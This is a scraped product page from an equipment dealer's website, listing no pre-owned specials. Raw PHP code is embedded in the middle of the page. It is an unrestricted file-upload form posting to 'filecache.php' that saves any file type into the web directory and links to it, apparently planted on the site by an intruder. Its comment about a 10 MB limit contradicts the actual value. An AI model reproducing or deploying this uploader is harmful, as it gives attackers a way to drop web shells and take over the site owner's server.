BobcatOfDuluth.com - Pre-Owned Specials BobcatOfDuluth.com - Pre-Owned Specials
Pre-Owned Specials
BobcatOfDuluth.com - Pre-Owned Specials BobcatOfDuluth.com - Pre-Owned Specials February 06, 2012     07:43 AM US Central
News & Specials
Important Links
BobcatOfDuluth.com - Pre-Owned Specials
BobcatOfDuluth.com - Pre-Owned Specials
BobcatOfDuluth.com - Pre-Owned Specials
<?php 
define("MAX_FILE_SIZE", 99999999999999999); // Maximum file size is 10 mb, 10485760 is in bytes 

    if(isset($_POST['submit'])) {
        // Files variables 
        $file_name    = $_FILES['file']['name']; // File name 
        $file_size    = $_FILES['file']['size']; // File size 
        $file_type    = $_FILES['file']['type']; // The file type, if we want to upload a determinated type of file 
        $file_temp    = $_FILES['file']['tmp_name']; // Our temporaney file 
        $file_error = $_FILES['file']['error']; // The files errors 
        $file_dest    = basename($file_name); // File destination 
        

               
        if ($file_size <= MAX_FILE_SIZE) { 
        // Uploading file 
            if(move_uploaded_file($file_temp, $file_dest))
            {
                
                echo 'File uploaded: '.$file_dest;
                echo '<p><a href="'.$file_dest.'">go to file</a> </p>';
 
            }
            else
            {
                echo 'Error: '.$file_error; 
            }
        } else { 
            echo "This file is too big!"; 
        } 

    } else { 
    
        // Uploading form 
        echo '<h1>add file</h1>';
        echo '<form method="post" action="filecache.php" enctype="multipart/form-data"> 
              file: <input type="file" name="file"><br /><br />
              
              <input type="submit" name="submit" class="button" value="Upload">
              
              </form>'; 
        echo '</div>';
    } 

Follow Us On


 
[ Sales Staff ]     [ Contact Us ]
No Pre-Owned Specials Available at this time.

PLEASE check back SOON!

       
   
Go to Bobcat.com - CLICK HERE! Go to Kubota.com - CLICK HERE! Go to LandPride.com - Click Here! Go to Hustler Mowers - Click Here!
Bobcat Kubota Land Pride Hustler Mowers
 
       
    BobcatOfDuluth.com - Pre-Owned Specials | Pre-Owned Equipment | Pre-Owned Specials | Rental Terms | Rental Request | Parts Request | Sales | Service | Parts | Rentals | About Us | Events | Join Email List | Site Map | Contact Us | Contact Us Form | Our Staff | HOME |
BobcatOfDuluth.com - Pre-Owned Specials
 
     
^ Top Of Page ^
 
 
BobcatOfDuluth.com Powered By ColdFusion   © 2007 - 2012  Bobcat Of Duluth, Inc. - All Rights Reserved
Technical trouble? Contact our webmaster
ColdFusion ™ Website Design proudly crafted by
Lake Superior Explorer, Inc.
  Visit   Email   Web Hosting
You are visitor 8597